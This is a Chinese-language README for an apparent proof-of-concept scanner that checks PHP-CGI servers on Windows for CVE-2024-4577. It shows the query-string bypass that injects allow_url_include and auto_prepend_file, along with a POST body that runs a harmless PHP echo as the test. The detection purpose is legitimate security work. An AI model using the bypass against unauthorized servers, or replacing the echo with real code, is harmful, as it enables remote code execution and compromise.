这个 Python 脚本是一个简单的 PoC (概念验证) 工具,用于检测 PHP 的最新漏洞 CVE-2024-4577。
⚠️ 本工具仅供安全诊断目的使用,并且仅可用于您自己拥有的系统或事先获得授权的目标。
该漏洞存在于 PHP 在 Windows 环境下以 CGI 模式运行时,能够通过多字节字符绕过注入任意 PHP 配置并导致代码执行的问题。
本脚本通过向目标 URL 发送基于查询字符串的绕过载荷和 PHP 代码的 POST 请求,判断是否存在漏洞。
python3 --version
pip install requests
python3 cve_2024_4577_test.py
示例输入:
http://192.168.0.10/index.php
或者仅输入根路径也会自动处理
http://192.168.0.10
✅ [✅] 취약: 서버가 PHP 코드를 실행했습니다.
→ 该服务器存在漏洞。
✔️ [✔️] 비취약 또는 차단됨
→ 收到了响应,但未触发漏洞。
❌ [❌] 요청 실패: ...
→ 因连接错误、超时等导致测试失败。
注入漏洞绕过字符串:
?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input
POST 正文中注入 PHP 代码:
<?php echo 'CVE-2024-4577-TEST'; ?>
如果服务器执行了此代码,响应中会包含该字符串,从而可以判断。
本脚本仅供教育和安全研究目的使用,扫描或测试未经授权的系统是非法的。使用者需自行承担所有责任。
| 文件名 | 描述 |
|---|---|
cve_2024_4577_test.py | 用于漏洞测试的 Python 脚本 |
README.md | 使用说明文档(本文件) |
LICENSE.txt |
如有 bug 报告或建议,请通过 email 或 PR 提交。
This project is licensed under the MIT License - see the LICENSE file for details. Copyright (c) 2025 KimJuhyeong95